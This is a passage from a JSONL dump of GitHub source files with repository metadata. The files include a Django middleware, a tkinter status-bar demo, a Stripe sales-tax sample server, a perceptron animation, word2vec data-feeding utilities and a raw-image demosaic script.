'%s%s/' % (script_prefix, country_code),\n 1\n )\n return self.response_redirect_class(language_url)\n\n return response\n\n @cached_property\n def is_language_prefix_patterns_used(self):\n for url_pattern in get_resolver(None).url_patterns:\n if isinstance(url_pattern, CountryRegexURLResolver):\n return True\n return False","repo_name":"ezdookie/django-country-site","sub_path":"django_country_site/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43738295171","text":"from tkinter import *\r\n\r\n\r\ndef upload():\r\n status.set(\"Busy...\")\r\n sbar.update()\r\n import time\r\n\r\n time.sleep(2)\r\n status.set(\"Ready \")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"500x400\")\r\nroot.title(\"Status Bar\")\r\n\r\nstatus = StringVar()\r\nstatus.set(\"Ready\")\r\nsbar = Label(root, textvariable=status, relief=SUNKEN, anchor=W)\r\nsbar.pack(side=BOTTOM, fill=X)\r\nButton(root, text=\"Upload\", command=upload).pack(pady=50)\r\nroot.mainloop()\r\n","repo_name":"PRINCE1503/Python_GUI-Code","sub_path":"16_Statusbar.py","file_name":"16_Statusbar.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"36397828549","text":"#! 
/usr/bin/env python3.6\n\n\"\"\"\nserver.py\nStripe Sample.\nPython 3.6 or newer required.\n\"\"\"\n\nimport stripe\nimport json\nimport os\nimport random\nfrom decimal import Decimal\n\nfrom flask import Flask, render_template, jsonify, request, send_from_directory\nfrom dotenv import load_dotenv, find_dotenv\n\n# Setup Stripe python client library\nload_dotenv(find_dotenv())\nstripe.api_key = os.getenv('STRIPE_SECRET_KEY')\nstripe.api_version = os.getenv('STRIPE_API_VERSION')\n\nstatic_dir = str(os.path.abspath(os.path.join(__file__ , \"..\", os.getenv(\"STATIC_DIR\"))))\napp = Flask(__name__, static_folder=static_dir,\n static_url_path=\"\", template_folder=static_dir)\n\n\n@app.route('/', methods=['GET'])\ndef get_example():\n # Display checkout page\n return render_template('index.html')\n\n\ndef calculate_order_amount(items):\n # Replace this constant with a calculation of the order's amount\n # Calculate the order total on the server to prevent\n # people from directly manipulating the amount on the client\n return 1400\n\n# Store tax amount for demo purposes\ntax_amount = 0\n\n\ndef calculate_tax_amount(postal_code, order_amount):\n # Use the postal code to calculate the amount of tax for the order\n # For the sample we will simply provide a random amount\n return random.randint(1, 500)\n\n\n@app.route('/stripe-key', methods=['GET'])\ndef fetch_key():\n # Send publishable key to client\n return jsonify({'publicKey': os.getenv('STRIPE_PUBLISHABLE_KEY')})\n\n\n@app.route('/calculate-tax', methods=['POST'])\ndef calculate_tax():\n global tax_amount\n data = json.loads(request.data)\n # Calculate order amount from items\n order_amount = calculate_order_amount(data['items'])\n # Calculate tax from order total and postal code\n tax_amount = calculate_tax_amount(data['postalCode'], order_amount)\n total = order_amount + tax_amount\n\n # Return new tax and total amounts to display on the client\n return jsonify({'tax': tax_amount / 100, 'total': total / 100})\n\n\n@app.route('/pay', methods=['POST'])\ndef pay():\n data = json.loads(request.data)\n try:\n if \"paymentIntentId\" not in data:\n global tax_amount\n order_amount = calculate_order_amount(data['items'])\n # Calculate tax from order total and postal code\n tax_amount = tax_amount or calculate_tax_amount(\n data['postalCode'], order_amount)\n\n # Create a new PaymentIntent for the order\n intent = stripe.PaymentIntent.create(\n amount=order_amount + tax_amount,\n currency=data['currency'],\n payment_method=data['paymentMethodId'],\n confirmation_method='manual',\n confirm=True\n )\n else:\n # Confirm the PaymentIntent to collect the money\n intent = stripe.PaymentIntent.confirm(data['paymentIntentId'])\n return generate_response(intent)\n except Exception as e:\n return jsonify(error=str(e)), 403\n\n\ndef generate_response(intent):\n status = intent['status']\n if status == 'requires_action' or status == 'requires_source_action':\n # Card requires authentication\n return jsonify({'requiresAction': True, 'paymentIntentId': intent['id'], 'clientSecret': intent['client_secret']})\n elif status == 'requires_payment_method' or status == 'requires_source':\n # Card was not properly authenticated, suggest a new payment method\n return jsonify({'error': 'Your card was denied, please provide a new payment method'})\n elif status == 'succeeded':\n # Payment is complete, authentication not required\n return jsonify({'clientSecret': intent['client_secret']})\n\n\nif __name__ == '__main__':\n 
app.run()\n","repo_name":"stripe-archive/adding-sales-tax","sub_path":"without-webhooks/server/python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"72570345047","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.animation as animation\nimport random\nimport randseq as rs\n\n\n\nX1=[]\nY1=[]\nZ1=[]\nX2=[]\nY2=[]\nZ2=[]\ndf = pd.read_csv(\"3D_Data.csv\")\nX = list(df['X1'])\nY = list(df['X2'])\nZ= list(df['X3'])\nlabel= list(df['Y'])\n\n#data01 = np.random.normal(5,1,size=[50, 3])\n#data12 = np.random.normal(50,1,size=[50, 3])\n\n\n\n \nX1 = []\nY1 = []\nZ1=[]\nfor i in range(1000):\n\t\n\tif label[i]==0:\n\t\tX2.append(X[i])\n\t\tY2.append(Y[i])\n\t\tZ2.append(Z[i])\n\t\tlabel[i]=-1\n\telse: \n\t\tX1.append(X[i])\n\t\tY1.append(Y[i])\n\t\tZ1.append(Z[i])\n\n\n\t\n\n\n\n#print(label)\nplt.rcParams[\"figure.figsize\"] = [15.00, 15.50]\nplt.rcParams[\"figure.autolayout\"] = False\n\nx = np.linspace(0, 10, 100)\ny = np.linspace(0, 10, 100)\n\nx, y = np.meshgrid(x, y)\n\n\nfig = plt.figure()\n\n#ax = fig.gca(projection='3d')\nax = fig.add_subplot(111,projection='3d')\n\n\"\"\" creating the scatter plot\"\"\"\n\n#ax.scatter(X,Y,Z, c='r', marker='o')\n\ndef init():\n\tax.scatter(0,0,0,c='r',marker='*')\n\treturn ax,\n\n\"\"\" the actual perceptron model\"\"\"\n\n\n\n\n\n\n\"\"\"the animation part\"\"\"\n\ndef updateweights(W,seq,sum,i):\n\tepsilon=0.01\n\talpha=0.001\n\tcount=0\n\t#print(W)\n\t#while(sum>epsilon and count<200):\n\t#Wprev=W.copy()\n\tvalue= W[0]+W[1]*X[seq[i]] + W[2]*Y[seq[i]] + W[3]*Z[seq[i]]\n\tprint(value,\"and\",label[seq[i]])\n\tcount+=1\n\tif value>0:\n\t\tv=1\n\telse:\n\t\tv=-1\n\t#print(\"i am in 1\",label[seq[i]])\n\tW[0]+=alpha*(label[seq[i]]-v)\n\tW[1]+= alpha*(label[seq[i]]-v)*X[seq[i]]\n\tW[2]+=alpha*(label[seq[i]]-v)*Y[seq[i]]\n\tW[3]+=alpha*(label[seq[i]]-v)*Z[seq[i]]\n\t#print(\"in the loops\",W,\" \",count)\n\n\n\n\t#print(W)\n\treturn [W[0],W[1],W[2],W[3]]\n\n\ndef perceptron(i,seq,sum,weights):\n\tax.clear()\n\tprint(i)\n\ti=i%1000\n\t#print(weights)\n\twprev=weights.copy()\n\n\tweights=updateweights(weights,seq,sum,i)\n\t#print(weights)\n\tsum=0\n\tfor j in range(len(weights)):\n\t\tsum+= (weights[j]-wprev[j])**2\n\tif sum<0.00001:\n\t\tweights=wprev.copy()\n\teq=-(weights[1]/weights[3])*x-(weights[2]/weights[3])*y-(weights[0]/weights[3])\n\tax.plot_surface(x, y, eq,color='black',alpha=1)\n\tax.scatter(X2,Y2,Z2, c='r', marker='o')\n\tax.scatter(X1,Y1,Z1, c='g', marker='o')\n\treturn ax,\n\nseq=rs.generateRandom(999)\nseq.append(0)\nsum=4\nweights=np.random.normal(0,1,size=[4,1])#[1,1,1,1]\n\"\"\"for c in range(201):\n\tweights.append([1,1,1,1])\"\"\"\n\nanim = animation.FuncAnimation(fig,perceptron,fargs=(seq,sum,weights),frames = 2000,init_func = init,interval = 100,repeat=False,blit = True)\n#anim.save('perceptron.mp4', writer = 'ffmpeg', fps = 30)\t\t\nplt.show()\n\n################################# extra code not needed now #####################################################\n","repo_name":"debsouvik/Machine-learning-in-pyhton","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23376727442","text":"# -*- coding:utf-8 -*-\n__author__ = 'Randolph'\n\nimport os\nimport heapq\nimport multiprocessing\nimport 
gensim\nimport logging\nimport json\nimport numpy as np\n\nfrom collections import OrderedDict\nfrom pylab import *\nimport gensim.models.keyedvectors as word2vec\nfrom gensim.models.word2vec import LineSentence\nfrom tflearn.data_utils import pad_sequences\n\nALL_TEXTS_INPUT = '../data/test_Randolph/content.txt'\nMETADATA_STORE_PATH = '../data/test_Randolph/metadata.tsv'\n\n\ndef logger_fn(name, input_file, level=logging.INFO):\n tf_logger = logging.getLogger(name)\n tf_logger.setLevel(level)\n log_dir = os.path.dirname(input_file)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n fh = logging.FileHandler(input_file, mode='w')\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n tf_logger.addHandler(fh)\n return tf_logger\n\n\ndef create_prediction_file(output_file, data_id,\n all_labels,\n all_predict_labels,\n all_predict_scores):\n \"\"\"\n Create the prediction file.\n\n Args:\n output_file: The output prediction file path\n data_id: The data record id info provided by class Data\n all_labels: The all origin labels\n all_predict_labels: The all predict labels by threshold\n all_predict_scores: The all predict scores by threshold\n Raises:\n IOError: If the prediction file is not a <.json> file\n \"\"\"\n if not output_file.endswith('.json'):\n raise IOError(\"✘ The prediction file is not a json file.\"\n \"Please make sure the prediction data is a json file.\")\n with open(output_file, 'w') as fout:\n data_size = len(all_predict_labels)\n for i in range(data_size):\n predict_labels = [int(i) for i in all_predict_labels[i]]\n predict_scores = [round(i, 4) for i in all_predict_scores[i]]\n labels = [int(i) for i in all_labels[i]]\n data_record = OrderedDict([\n ('id', data_id[i]),\n ('labels', labels),\n ('predict_labels', predict_labels),\n ('predict_scores', predict_scores)\n ])\n fout.write(json.dumps(data_record, ensure_ascii=False) + '\\n')\n\n\ndef get_onehot_label_threshold(scores, threshold=0.5):\n \"\"\"\n Get the predicted onehot labels based on the threshold.\n If there is no predict score greater than threshold, then choose the label\n which has the max predict score.\n\n Args:\n scores: The all classes predicted scores provided by network\n threshold: The threshold (default: 0.5)\n Returns:\n predicted_onehot_labels: The predicted labels (onehot)\n \"\"\"\n predicted_onehot_labels = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n count = 0\n onehot_labels_list = [0] * len(score)\n for index, predict_score in enumerate(score):\n if predict_score >= threshold:\n onehot_labels_list[index] = 1\n count += 1\n if count == 0:\n max_score_index = score.index(max(score))\n onehot_labels_list[max_score_index] = 1\n predicted_onehot_labels.append(onehot_labels_list)\n return predicted_onehot_labels\n\n\ndef get_onehot_label_topk(scores, top_num=1):\n \"\"\"\n Get the predicted onehot labels based on the topK number.\n\n Args:\n scores: The all classes predicted scores provided by network\n top_num: The max topK number (default: 1)\n Returns:\n predicted_onehot_labels: The predicted labels (onehot)\n \"\"\"\n predicted_onehot_labels = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n onehot_labels_list = [0] * len(score)\n max_num_index_list = list(map(score.index, heapq.nlargest(top_num,\n score)))\n for i in max_num_index_list:\n onehot_labels_list[i] = 1\n predicted_onehot_labels.append(onehot_labels_list)\n return predicted_onehot_labels\n\n\ndef 
get_label_threshold(scores, threshold=0.5):\n \"\"\"\n Get the predicted labels based on the threshold.\n If there is no predict score greater than threshold, then choose the label\n which has the max predict score.\n Note: Only Used in `test_model.py`\n\n Args:\n scores: The all classes predicted scores provided by network\n threshold: The threshold (default: 0.5)\n Returns:\n predicted_labels: The predicted labels\n predicted_scores: The predicted scores\n \"\"\"\n predicted_labels = []\n predicted_scores = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n count = 0\n index_list = []\n score_list = []\n for index, predict_score in enumerate(score):\n if predict_score >= threshold:\n index_list.append(index)\n score_list.append(predict_score)\n count += 1\n if count == 0:\n index_list.append(score.index(max(score)))\n score_list.append(max(score))\n predicted_labels.append(index_list)\n predicted_scores.append(score_list)\n return predicted_labels, predicted_scores\n\n\ndef get_label_topk(scores, top_num=1):\n \"\"\"\n Get the predicted labels based on the topK number.\n Note: Only Used in `test_model.py`\n\n Args:\n scores: The all classes predicted scores provided by network\n top_num: The max topK number (default: 1)\n Returns:\n The predicted labels and scores\n \"\"\"\n predicted_labels = []\n predicted_scores = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n score_list = []\n index_list = np.argsort(score)[-top_num:]\n index_list = index_list[::-1]\n for index in index_list:\n score_list.append(score[index])\n predicted_labels.append(np.ndarray.tolist(index_list))\n predicted_scores.append(score_list)\n return predicted_labels, predicted_scores\n\n\ndef create_metadata_file(embedding_size, output_file=METADATA_STORE_PATH):\n \"\"\"\n Create the metadata file based on the corpus file(Use for the Embedding\n Visualization later).\n\n Args:\n embedding_size: The embedding size\n output_file: The metadata file (default: 'metadata.tsv')\n Raises:\n IOError: If word2vec model file doesn't exist\n \"\"\"\n word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n\n if not os.path.isfile(word2vec_file):\n raise IOError(\"✘ The word2vec file doesn't exist.\"\n \"Please use function to create it!\")\n\n model = gensim.models.Word2Vec.load(word2vec_file)\n word2idx = dict([(k, v.index) for k, v in model.wv.vocab.items()])\n word2idx_sorted = [(k, word2idx[k]) for k in sorted(word2idx,\n key=word2idx.get,\n reverse=False)]\n\n with open(output_file, 'w+') as fout:\n for word in word2idx_sorted:\n if word[0] is None:\n print(\"Empty line, should be replaced by anything else, \"\n \"or it will cause a bug in tensorboard\")\n fout.write('' + '\\n')\n else:\n fout.write(word[0] + '\\n')\n\n\ndef create_word2vec_model(embedding_size,\n word2vec_path,\n input_file=ALL_TEXTS_INPUT):\n \"\"\"\n Create the word2vec model based on the given embedding size and the\n corpus file.\n\n Args:\n embedding_size: The embedding size\n input_file: The corpus file\n \"\"\"\n word2vec_path = '../data/word2vec_' + str(embedding_size) + '.model'\n\n sentences = LineSentence(input_file)\n \n # sg=0 means to use CBOW (default); sg=1 means use skip-gram model\n model = gensim.models.Word2Vec(sentences,\n size=embedding_size,\n min_count=0,\n sg=0,\n workers=multiprocessing.cpu_count())\n model.save(word2vec_path)\n\n\ndef load_vocab_size(embedding_size,\n word2vec_path):\n \"\"\"\n Return the vocab size of the word2vec file.\n\n Args:\n embedding_size: The embedding size\n word2vec_path: Path 
of word2vec\n Returns:\n The vocab size of the word2vec file\n Raises:\n IOError: If word2vec model file doesn't exist\n \"\"\"\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n\n # word2vec_file = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if not os.path.isfile(word2vec_path):\n raise IOError(\"✘ The word2vec file doesn't exist.\"\n \"Please use function to create it!\")\n\n # model = word2vec.Word2Vec.load(word2vec_file)\n model = word2vec.KeyedVectors.load_word2vec_format(\n word2vec_path, binary=True, limit=400000)\n\n return len(model.wv.vocab.items())\n\n\ndef data_word2vec(input_file,\n num_labels,\n word2vec_model):\n \"\"\"\n Create the research data token index based on the word2vec model file.\n Return the class Data(includes the data token index and data labels).\n\n Args:\n input_file: The research data\n num_labels: The number of classes\n word2vec_model: The word2vec model file\n Returns:\n The class Data(includes the data tokenindex and data labels)\n Raises:\n IOError: If the input file is not the .json file\n \"\"\"\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n def _create_onehot_labels(_labels_index,\n _num_labels):\n label = [0] * _num_labels\n for item in _labels_index:\n label[int(item)] = 1\n return label\n\n if not input_file.endswith('.json'):\n raise IOError(\"✘ The research data is not a json file. \"\n \"Please preprocess the research data into the \"\n \"json file.\")\n \n with open(input_file) as fin:\n test_id_list = []\n content_index_list = []\n labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n test_id = data['testid']\n features_content = data['features_content']\n labels_index = data['labels_index']\n labels_num = data['labels_num']\n\n test_id_list.append(test_id)\n content_index_list.append(_token_to_index(features_content))\n labels_list.append(labels_index)\n onehot_labels_list.append(_create_onehot_labels(labels_index,\n num_labels))\n labels_num_list.append(labels_num)\n total_line += 1\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def tokenindex(self):\n return content_index_list\n\n @property\n def labels(self):\n return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()\n\n\ndef data_word2vec_one_label(input_file,\n num_labels,\n word2vec_model):\n \"\"\"\n Create the research data token index based on the word2vec model file.\n Return the class Data(includes the data token index and data labels).\n\n Args:\n input_file: The research data\n num_labels: The number of classes\n word2vec_model: The word2vec model file\n Returns:\n The class Data(includes the data tokenindex and data labels)\n Raises:\n IOError: If the input file is not the .json file\n \"\"\"\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n \n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n \n # def _create_onehot_labels(_labels_index,\n # _num_labels):\n # 
label = [0] * _num_labels\n # for item in _labels_index:\n # label[int(item)] = 1\n # return label\n \n if not input_file.endswith('.json'):\n raise IOError(\"✘ The research data is not a json file. \"\n \"Please preprocess the research data into the \"\n \"json file.\")\n \n with open(input_file) as fin:\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n \n for each_line in fin:\n data = json.loads(each_line)\n test_id = data['testid']\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n \n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n \n class _Data:\n def __init__(self):\n pass\n \n @property\n def number(self):\n return total_line\n \n @property\n def testid(self):\n return test_id_list\n \n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n \n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n \n @property\n def onehot_labels(self):\n return onehot_labels_list\n \n @property\n def labels_num(self):\n return labels_num_list\n \n return _Data()\n\n\ndef data_augmented(data, drop_rate=1.0):\n \"\"\"\n Data augmented.\n\n Args:\n data: The Class Data()\n drop_rate: The drop rate\n Returns:\n aug_data\n \"\"\"\n aug_num = data.number\n aug_testid = data.testid\n aug_tokenindex = data.tokenindex\n aug_labels = data.labels\n aug_onehot_labels = data.onehot_labels\n aug_labels_num = data.labels_num\n\n for i in range(len(data.tokenindex)):\n data_record = data.tokenindex[i]\n if len(data_record) == 1: # sentence length is 1: skip augmentation\n continue\n elif len(data_record) == 2: # sentence length is 2: swap the order of the two words\n data_record[0], data_record[1] = data_record[1], data_record[0]\n aug_testid.append(data.testid[i])\n aug_tokenindex.append(data_record)\n aug_labels.append(data.labels[i])\n aug_onehot_labels.append(data.onehot_labels[i])\n aug_labels_num.append(data.labels_num[i])\n aug_num += 1\n else:\n data_record = np.array(data_record)\n for num in range(len(data_record) // 10): #\n # number of shuffles, i.e. the number of samples generated; it depends on the sentence length\n # random shuffle & random drop\n data_shuffled = np.random.permutation(\n np.arange(int(len(data_record) * drop_rate)))\n new_data_record = data_record[data_shuffled]\n\n aug_testid.append(data.testid[i])\n aug_tokenindex.append(list(new_data_record))\n aug_labels.append(data.labels[i])\n aug_onehot_labels.append(data.onehot_labels[i])\n aug_labels_num.append(data.labels_num[i])\n aug_num += 1\n\n class _AugData:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return aug_num\n\n @property\n def testid(self):\n return aug_testid\n\n @property\n def tokenindex(self):\n return aug_tokenindex\n\n @property\n def labels(self):\n return aug_labels\n\n @property\n def onehot_labels(self):\n return aug_onehot_labels\n\n @property\n def labels_num(self):\n return aug_labels_num\n\n return _AugData()\n\n\ndef load_word2vec_matrix(vocab_size,\n embedding_size,\n word2vec_path):\n \"\"\"\n Return the word2vec model matrix.\n\n Args:\n vocab_size: The vocab size of the word2vec model file\n 
embedding_size: The embedding size\n word2vec_path: path of pretrained word2vec\n Returns:\n The word2vec model matrix\n Raises:\n IOError: If word2vec model file doesn't exist\n \n \"\"\"\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n\n if not os.path.isfile(word2vec_path):\n raise IOError(\"✘ The word2vec file doesn't exist. \"\n \"Please use function to create it!\")\n\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=400000)\n\n vocab = dict([(k, v.index) for k, v in model.wv.vocab.items()])\n vector = np.zeros([vocab_size, embedding_size])\n for key, value in vocab.items():\n if key is not None:\n vector[value] = model[key]\n return vector\n\n\ndef load_data_and_labels(data_file,\n num_labels,\n embedding_size,\n data_aug_flag,\n word2vec_path,\n use_pretrain=True):\n \"\"\"\n Load research data from files, splits the data into words and generates\n labels. Return split sentences, labels and the max sentence length of\n the research data.\n\n Args:\n data_file: The research data\n num_labels: The number of classes\n embedding_size: The embedding size\n data_aug_flag: The flag of data augmented\n word2vec_path: path of pretrained word2vec\n use_pretrain: whether to use pretrained word2vec\n Returns:\n The class Data\n \"\"\"\n ###########################################################################\n #\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n #\n # # Load word2vec model file\n # if not os.path.isfile(word2vec_file):\n # create_word2vec_model(embedding_size, TEXT_DIR)\n ###########################################################################\n \n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if use_pretrain:\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=400000)\n else:\n create_word2vec_model(embedding_size,\n ALL_TEXTS_INPUT)\n\n # Load data from files and split by words\n data = data_word2vec(input_file=data_file,\n num_labels=num_labels,\n word2vec_model=model)\n if data_aug_flag:\n data = data_augmented(data)\n\n # plot_seq_len(data_file, data)\n\n return data\n\n\ndef load_data_and_labels_one_label(data_file,\n num_labels,\n embedding_size,\n data_aug_flag,\n word2vec_path,\n use_pretrain=True):\n \"\"\"\n Load research data from files, splits the data into words and generates\n labels. 
Return split sentences, labels and the max sentence length of\n the research data.\n\n Args:\n data_file: The research data\n num_labels: The number of classes\n embedding_size: The embedding size\n data_aug_flag: The flag of data augmented\n word2vec_path: path of pretrained word2vec\n use_pretrain: whether to use pretrained word2vec\n Returns:\n The class Data\n \"\"\"\n \n ###########################################################################\n #\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n #\n # # Load word2vec model file\n # if not os.path.isfile(word2vec_file):\n # create_word2vec_model(embedding_size, TEXT_DIR)\n ###########################################################################\n \n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if use_pretrain:\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=250000)\n else:\n create_word2vec_model(embedding_size,\n ALL_TEXTS_INPUT)\n \n # Load data from files and split by words\n data = data_word2vec_one_label(input_file=data_file,\n num_labels=num_labels,\n word2vec_model=model)\n if data_aug_flag:\n data = data_augmented(data)\n \n # plot_seq_len(data_file, data)\n \n return data\n\n\ndef pad_data(data, pad_seq_len):\n \"\"\"\n Padding each sentence of research data according to the max sentence length.\n Return the padded data and data labels.\n\n Args:\n data: The research data\n pad_seq_len: The max sentence length of research data\n Returns:\n pad_seq: The padded data\n labels: The data labels\n \"\"\"\n pad_seq = pad_sequences(data.tokenindex, maxlen=pad_seq_len, value=0.)\n onehot_labels = data.onehot_labels\n return pad_seq, onehot_labels\n\n\ndef pad_data_one_label(data,\n pad_seq_len_gov,\n pad_seq_len_art):\n \"\"\"\n Padding each sentence of research data according to the max sentence length.\n Return the padded data and data labels.\n\n Args:\n data: The research data\n pad_seq_len_gov: The max sentence length of the gov data\n pad_seq_len_art: The max sentence length of the art data\n Returns:\n pad_seq: The padded data\n labels: The data labels\n \"\"\"\n pad_seq_gov = pad_sequences(data.tokenindex_gov,\n maxlen=pad_seq_len_gov,\n value=0.)\n \n pad_seq_art = pad_sequences(data.tokenindex_art,\n maxlen=pad_seq_len_art,\n value=0.)\n\n onehot_labels = data.onehot_labels\n return pad_seq_gov, \\\n pad_seq_art, \\\n onehot_labels\n\n\ndef plot_seq_len(data_file, data, percentage=0.98):\n \"\"\"\n Visualizing the sentence length of each data sentence.\n\n Args:\n data_file: The data_file\n data: The class Data (includes the data tokenindex and data labels)\n percentage: The percentage of the total data you want to show\n \"\"\"\n data_analysis_dir = '../data/data_analysis/'\n if 'train' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Train Sequence Length Distribution Histogram.png'\n if 'validation' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Validation Sequence Length Distribution Histogram.png'\n if 'test' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Test Sequence Length Distribution Histogram.png'\n result = dict()\n for x in data.tokenindex:\n if len(x) not in result.keys():\n result[len(x)] = 1\n else:\n result[len(x)] += 1\n freq_seq = [(key, result[key]) for key in sorted(result.keys())]\n x = []\n y = []\n avg = 0\n count = 0\n border_index = []\n for item in freq_seq:\n x.append(item[0])\n y.append(item[1])\n avg += item[0] * item[1]\n count += item[1]\n if count > data.number * percentage:\n 
border_index.append(item[0])\n avg = avg / data.number\n print('The average of the data sequence length is {0}'.format(avg))\n print('The recommended padding sequence length should be more than {0}'.\n format(border_index[0]))\n xlim(0, 400)\n plt.bar(x, y)\n plt.savefig(output_file)\n plt.close()\n\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n Because this function contains `yield`, it is not an ordinary function but a generator.\n Behavior: the data is processed for num_epochs epochs; within each epoch, if\n shuffle=True the data is reshuffled,\n and the reshuffled data is yielded batch by batch, each batch of size batch_size,\n for int(len(data)/batch_size)+1 batches in total.\n\n Args:\n data: The data\n batch_size: The size of the data batch\n num_epochs: The number of epochs. Assign 1 at test time.\n shuffle: Shuffle or not (default: True)\n Returns:\n A batch iterator for data set\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((data_size - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n","repo_name":"syyunn/DeepWTO","sub_path":"utils/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":26888,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"72219512089","text":"import cv2\nimport numpy as np\nimport glob\nimport os\nimport argparse\n\n\ndef demosaic(raw_image):\n return cv2.cvtColor(raw_image, cv2.COLOR_BAYER_BG2BGR)\n\n\ndef rescale(rgb_image, dtype):\n if dtype == 'float32':\n max = 1.0\n elif dtype == 'uint8':\n max = 255.0\n elif dtype == 'uint16':\n max = 65535.0\n else:\n raise ValueError('not supported data type.')\n\n # Rescale pixel value range\n rgb_image = rgb_image.astype(np.float32)\n rgb_image = rgb_image / np.max(rgb_image)\n rgb_image = np.clip(rgb_image, 0.0, 1.0) * max\n rgb_image = rgb_image.astype(dtype)\n\n return rgb_image\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--load_dir', type=str, required=True, help='input dir that contains rgb images')\n parser.add_argument('--save_dir', type=str, required=True, help='output dir that saves rgb images')\n parser.add_argument('--width', type=int, required=True, help='raw input width')\n parser.add_argument('--height', type=int, required=True, help='raw input height')\n parser.add_argument('--ext', type=str, default='raw', help='search extension')\n parser.add_argument('--data_type', type=str, default='float32', choices=['float32', 'uint8', 'uint16'], help='input data type')\n args = parser.parse_args()\n\n if args.data_type == 'float32':\n data_type = np.float32\n elif args.data_type == 'uint8':\n data_type = np.uint8\n elif args.data_type == 'uint16':\n data_type = np.uint16\n else:\n raise ValueError('not supported data type.')\n\n files = sorted(glob.glob(os.path.join(args.load_dir, '*.' 
+ args.ext)))\n    for i, file in enumerate(files):\n        raw_data = np.fromfile(file, data_type)\n        raw_image = raw_data.reshape(args.height, args.width, 1)\n\n        rgb_image = demosaic(raw_image)\n        rgb_image = rescale(rgb_image, rgb_image.dtype)\n\n        if not os.path.exists(args.save_dir):\n            os.makedirs(args.save_dir)\n        file_name = os.path.splitext(os.path.basename(file))[0]\n        cv2.imwrite(os.path.join(args.save_dir, file_name + '.png'), rgb_image)\n\n        print('{} / {} finished!'.format(i+1, len(files)))\n","repo_name":"ksekine/raw_rgb_converter","sub_path":"raw2rgb.py","file_name":"raw2rgb.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10475382532","text":"# Got TLE (time limit exceeded) badly with the first version\nimport sys\nm = int(input())\ndata = set()\n\nfor _ in range(m):\n    command = sys.stdin.readline().rstrip().split()\n    if len(command) == 1:\n        if command[0] == 